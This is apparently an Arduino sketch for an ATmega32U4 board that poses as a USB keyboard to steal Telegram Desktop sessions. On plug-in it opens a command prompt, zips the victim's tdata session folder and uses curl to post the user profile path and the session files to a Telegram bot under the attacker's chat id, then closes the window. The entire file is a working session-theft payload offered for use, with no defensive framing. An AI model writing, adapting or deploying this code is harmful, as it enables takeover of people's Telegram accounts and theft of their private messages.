/*ATmega32U4 (Lily GO)*/

#include "Keyboard.h"

void typeKey(int key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

/* Init function */
void setup()
{
  Keyboard.begin();

  delay(1500);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();

  delay(100);

  Keyboard.print("cmd");

  typeKey(KEY_RETURN);

  delay(500);

  Keyboard.print ("cd %appdata%/Telegram Desktop/tdata && tar -a -c -f tele_cookies.zip D877F783D5D3EF8C && curl -s -X POST \"https://api.telegram.org/bot1310006155:apixxxxx/sendmessage?chat_id=1268153988&text=%userprofile%\" && curl -s -X POST \"https://api.telegram.org/bot1310006155:apixxxxx/sendDocument?chat_id=1268153988\" -F document=@\"D877F783D5D3EF8Cs\" && curl -s -X POST \"https://api.telegram.org/bot1310006155:apixxxxx/sendDocument?chat_id=1268153988\" -F document=@\"tele_cookies.zip\"");

  typeKey(KEY_RETURN);

  delay(100);

  Keyboard.print("exit");

  typeKey(KEY_RETURN);

  Keyboard.end();
}
void loop() {}
